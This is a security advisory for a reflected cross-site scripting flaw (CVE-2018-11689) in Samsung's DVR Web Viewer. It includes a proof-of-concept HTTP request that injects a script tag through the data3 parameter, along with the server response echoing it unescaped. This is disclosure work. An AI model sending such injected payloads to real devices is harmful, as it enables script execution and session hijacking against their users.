I. VULNERABILITY ------------------------- Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS) II. CVE REFERENCE ------------------------- CVE-2018-11689 III. REFERENCES ------------------------- https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689 IV. CREDIT ------------------------- Yavuz Atlas - Biznet Bilisim http://www.biznet.com.tr/biznet-guvenlik-duyurulari V. DESCRIPTION ------------------------- Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is vulnerable to cross-site scripting. The vulnerability allows remote attackers to inject arbitrary web script or HTML. VI. PROOF OF CONCEPT ------------------------- Request: GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script> HTTP/1.1 Host: 10.10.10.10 Response: HTTP/1.1 200 OK X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true Content-type: text/html Connection: close Date: Wed, 23 May 2018 11:14:09 GMT Server: lighttpd/1.4.35 Content-Length: 10797 … function setcookie(){ var val_rand = Math.random(); if(is_close_user_session == true) document.login_page_submit.close_user_session.value = 1; else document.login_page_submit.close_user_session.value = 0; document.login_page_submit.data1.value = data_parser(document.login_page.data1.value); document.login_page_submit.data2.value = do_encrypt(document.login_page.data2.value); document.login_page_submit.data3.value = </script><script>alert(1)</script>; document.login_page_submit.data4.value = val_rand; document.login_page_submit.submit(); } …
